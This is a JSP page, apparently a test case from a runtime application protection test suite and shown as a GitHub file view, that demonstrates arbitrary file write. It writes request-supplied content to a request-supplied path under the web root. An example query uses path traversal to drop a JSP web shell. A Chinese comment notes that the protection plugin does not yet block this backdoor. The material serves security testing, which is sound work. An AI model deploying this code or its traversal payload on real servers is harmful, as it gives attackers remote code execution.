-
Notifications
You must be signed in to change notification settings - Fork 0
/
005-file-write.jsp
46 lines (45 loc) · 1.54 KB
/
005-file-write.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<%@page import="java.io.*" %>
<%@page contentType="text/html; charset=UTF-8" %>
<html>
<head>
<meta charset="UTF-8"/>
<title>005 任意文件写入</title>
</head>
<body>
<%
String normal_querystring = "?filename=123.txt&filedata=some-report-data";
String linux_querystring = "?filename=reports/../123.jsp&filedata=some-webshell-data";
String bytes = request.getParameter("filedata");
String fname = request.getParameter("filename");
if (fname == null || bytes == null) {
%>
<p>注意: 由于可能产生误报,所以目前官方插件不会拦截这种使用 FileOutputStream 写文件的后门,我们会尽快解决</p>
<%
}
else {
try {
String path;
String serverInfo = application.getServerInfo();
if (serverInfo != null && serverInfo.toLowerCase().contains("weblogic")) {
path = application.getResource("/").getPath() + "/" + fname;
} else {
path = application.getRealPath("/") + "/" + fname;
}
FileOutputStream os = new FileOutputStream(path);
PrintWriter writer = new PrintWriter(os);
writer.print(bytes);
writer.close();
out.println("==>" + path);
} catch (Exception e) {
out.print("<pre>");
e.printStackTrace(response.getWriter());
out.print("</pre>");
}
}
%>
<p>正常调用</p>
<p>curl '<a href="<%=request.getRequestURL()+normal_querystring%>" target="_blank"><%=request.getRequestURL()+normal_querystring%></a>'</p>
<p>不正常调用</p>
<p>curl '<a href="<%=request.getRequestURL()+linux_querystring%>" target="_blank"><%=request.getRequestURL()+linux_querystring%></a>'</p>
</body>
</html>